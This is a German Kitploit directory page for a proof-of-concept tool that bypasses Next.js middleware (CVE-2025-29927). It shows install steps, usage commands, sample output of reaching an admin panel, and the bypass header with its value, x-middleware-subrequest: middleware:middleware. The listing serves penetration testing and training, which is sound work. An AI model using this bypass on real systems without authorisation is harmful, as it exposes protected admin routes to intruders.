Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-for-Next.js-Middleware — > 🔓 Proof-of-Concept für einen fiktiven Next.js-Middleware-Bypass (CVE-2025-29927) — erstelle Sub-Requests, um geschützte Routen zu testen. | Kitploit
Tools/GitHubGitHub/m2hcz/poc-for-next.js-middleware
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubm2hcz/poc-for-next.js-middleware

PoC-for-Next.js-Middleware

> 🔓 Proof-of-Concept für einen fiktiven Next.js-Middleware-Bypass (CVE-2025-29927) — erstelle Sub-Requests, um geschützte Routen zu testen.

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
1vor 1 JahrNoch nicht geprüft

PoC für Next.js-Middleware-Bypass (CVE-2025-29927)

Python Version Status

Dies ist ein Proof-of-Concept für eine fiktive Sicherheitslücke im Next.js-Middleware-Bypass (CVE-2025-29927). Verwenden Sie es ausschließlich für Schulungszwecke und autorisierte Sicherheitsforschung.


🚀 Funktionen

FunktionBeschreibung
✨ Farbcodierung & VerboseFarbcodierte Ausgabe; -v für detaillierte Debug-Logs.
📦 OOP-StrukturKlassenbasiertes Design für Klarheit und Wartbarkeit.
🌐 Proxy-UnterstützungLeite Datenverkehr über HTTP(S)-Proxys mit --proxy.
🍪 SitzungsverwaltungBeständige requests.Session für Cookies & Wiederverwendung von Verbindungen.
🚦 WeiterleitungssteuerungKeine Weiterleitungen standardmäßig; erkennt klar Erfolg vs. Fehlschlag.
🛠 Benutzerdefinierte HeaderÜberschreibe User-Agent, x-middleware-subrequest oder füge Header hinzu.

⚡ Installation

root@kitploit:~
# Clone repository
git clone https://github.com/your-username/nextjs-middleware-poc.git
cd nextjs-middleware-poc

# (Optional) Create virtual environment
python3 -m venv .venv
source .venv/bin/activate

# Install dependencies
pip install -r requirements.txt

Erfordert Python 3.7+


🎯 Verwendung

root@kitploit:~
python poc.py [options] <host>[:port]

🔍 Beispiele

1. Grundlegender Test

root@kitploit:~
python poc.py localhost:3000

2. HTTPS & Benutzerdefinierter Pfad

root@kitploit:~
python poc.py example.com -s https -p /dashboard

3. Proxy & Verbose

root@kitploit:~
python poc.py internal-app:8080 --proxy http://127.0.0.1:8080 -v

✅ Erwartete Ausgabe

Erfolg

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[+] SUCCESS: Middleware bypassed — access granted!
--- Response Snippet ---
<!DOCTYPE html><html>…<title>Admin Panel</title>…

Fehlschlag

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[-] FAIL: Access denied by middleware (302 Redirect)

Tool herunterladen
OptionBeschreibung
-p, --path PATHGeschützter Routenpfad (Standard: /admin)
-s, --scheme {http,https}Protokoll (Standard: http)
--header HEADERx-middleware-subrequest-Headerwert (Standard: middleware:middleware)
-ua, --user-agent AGENTBenutzerdefinierter User-Agent (Standard: Mozilla/5.0)
--proxy PROXYHTTP(S)-Proxy-URL (z. B. http://127.0.0.1:8080)
-v, --verboseDebug-Ausgabe aktivieren
-h, --helpDiese Hilfemeldung anzeigen